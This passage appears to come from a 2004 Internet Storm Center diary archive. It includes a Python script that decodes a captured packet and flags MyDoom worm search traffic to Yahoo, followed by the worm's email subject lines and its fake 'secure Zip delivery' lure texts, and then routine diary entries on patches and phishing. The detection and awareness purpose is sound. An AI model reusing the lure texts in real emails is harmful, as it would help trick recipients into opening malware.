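0x0120 5573 6572 2d41 6765 6e74 3a20 4d6f 7a69 User-Agent:.Mozi
0x0130 6c6c 612f 342e 300d 0a48 6f73 743a 2045 lla/4.0..Host:.E
0x0140 4d41 494c 2e50 454f 504c 452e 5941 484f MAIL.PEOPLE.YAHO
0x0150 4f2e 434f 4d0d 0a0d 0a O.COM....
"""

HEX_LINE = re.compile(r"^0x([0-9a-fA-F]{4})\s+(.*)$")
HEX_GROUP = re.compile(r"^[0-9a-fA-F]{2}(?:[0-9a-fA-F]{2})?$")   # 2 or 4 hex digits


def parse_hexdump(text):
    """Raw bytes from tcpdump -x output: at most eight 16-bit groups per line,
    the ASCII column after them is ignored, offsets must be contiguous."""
    data = bytearray()
    for line in text.splitlines():
        m = HEX_LINE.match(line.strip())
        if not m:
            continue
        if int(m.group(1), 16) != len(data):
            raise ValueError("hex dump is not contiguous")
        for tok in m.group(2).split()[:8]:
            if not HEX_GROUP.match(tok):
                break
            data += bytes.fromhex(tok)
    return bytes(data)


def decode_ipv4_tcp(pkt):
    """Header fields and TCP payload, honouring IHL and the TCP data offset."""
    ihl = (pkt[0] & 0x0F) * 4
    total_len = int.from_bytes(pkt[2:4], "big")
    if pkt[9] != 6:
        raise ValueError("not TCP")
    tcp = pkt[ihl:total_len]
    data_off = (tcp[12] >> 4) * 4
    return {
        "src": ".".join(map(str, pkt[12:16])),
        "dst": ".".join(map(str, pkt[16:20])),
        "src_port": int.from_bytes(tcp[0:2], "big"),
        "dst_port": int.from_bytes(tcp[2:4], "big"),
        "flags": tcp[13],                               # 0x18 = PSH|ACK
        "window": int.from_bytes(tcp[14:16], "big"),
        "payload": tcp[data_off:],
    }


def parse_http_payload(payload):
    """First line plus a lower-cased header dict; body (if any) is dropped."""
    head, _sep, _body = payload.partition(b"\r\n\r\n")
    lines = head.decode("ascii", "replace").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"request_line": lines[0], "headers": headers}


def looks_like_mydoom_search(http):
    """The two conditions the beta rules above combine with flowbits."""
    return ("/py/psSearch.py?" in http["request_line"]
            and http["headers"].get("host", "").upper() == "EMAIL.PEOPLE.YAHOO.COM")


if __name__ == "__main__":
    info = decode_ipv4_tcp(parse_hexdump(HEXDUMP))
    http = parse_http_payload(info["payload"])
    print(info["src"], "->", info["dst"], http["request_line"], http["headers"]["host"])
    print("MyDoom people-search pattern:", looks_like_mydoom_search(http))
```

The decoded window (17520) and PSH|ACK flags agree with the summary line, the total length 0x0159 = 345 is 40 header bytes plus the 305-byte segment, and the TTL of 128 with Accept-* headers copied from Internet Explorer is consistent with the worm doing its own HTTP from a Windows host.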

Message subjects(?):

SN: New secure mail

Secure delivery

failed transaction

Re: hello (Secure-Mail)

Re: Extended Mail

Delivery Status (Secure)

Re: Server Reply

SN: Server Status

Message body contains(?):

Automatically Secure Delivery: for

Mail Delivery Server System: for

Extended secure mail message available at:

Secure Mail Server Notification: for

New mail secure method implement: for

New policy requested by mail server to returned mail
as a secure compiled attachment (Zip).

Now a new message is available as secure Zip file format.
Due to new policies on clients.

This message is available as a secure Zip file format
due to a new security policy.

For security measures this message has been packed as Zip format.
This is a newly added security feature.

New policy recommends to enclose all messages as Zip format.
Your message is available in this server notice.

You have received a message that implements secure delivery technology.
Message available as a secure Zip file.

This message is an automatically server notice
from Administration at

Server Notice: New security feature added. MSG:ID: 455sec86

New feature added for security reasons

Automatically server notice:,
Server reply from

New service policy for security added from

The executable contains the following names that are used to search Yahoo:



Handler on Duty: Tom Liston ( http://www.labreatechnologies.com )


Published: 2004-08-02

A very [word beginning with 'q' deleted] day and helpful links

Not Much Happening

All in all it's been a fairly uneventful day.

Helpful Links

Dshield reports - http://www.dshield.org/reports.php

Last 25 papers added to the SANS Reading room - http://www.sans.org/rr/last.php

Local Mentor Program - http://www.sans.org/local/about.php

How to submit logs to Dshield - http://www.dshield.org/howto.php

Sample Policies - http://www.sans.org/resources/policies/

SANS FAQ - http://www.sans.org/faq.php

Reading Room - http://www.sans.org/rr/

Upcoming Webcasts - http://www.sans.org/webcasts/

Volunteer Program - http://www.sans.org/conference/volunteer.php


Published: 2004-08-01

Update to MS04-025; Windows 2003 Guides Released; Port 3072; Your Daily Phish

Update to MS04-025 for XP users

For all folks using Windows XP, it is advised that you do another Windows Update to ensure that your patches have been correctly updated.

Microsoft stated the following:

"Subsequent to the release of this security bulletin, Microsoft was
made aware that the update provided for Windows XP customers running
the new version of Windows Update, Windows Update Version 5, did not
contain the final release code for the vulnerabilities addressed in
the security bulletin. Microsoft has corrected the update and is
re-releasing this bulletin to advise of the availability of a revised
update available to Windows Update Version 5 customers. Customers who
are utilizing Windows Update Version 4, the vast majority of
customers, are not affected by this revision."


Windows 2003 Guides Released

Microsoft has released two documents, available for download at the links below, that contain excellent security information and references to tools every administrator can use.

Threats and Countermeasures: Security Settings in Windows Server 2003 and
Windows XP

Windows Server 2003 Security Guide

Port 3072

We have received more emails concerning traffic on Port 3072 and some good suggestions as to the cause. If you have any captures of the traffic, please pass them our direction.

Your Daily Phish

A user submitted another phishing e-mail scam to the ISC today. This one wanted the victim to change their PIN. As a general reminder, keep in mind which e-mail address, if any, you have given to your financial institution(s), and always verify before you update any information requested via e-mail.

Lorna J. Hutcheson/Tony Carothers

Handler on Duty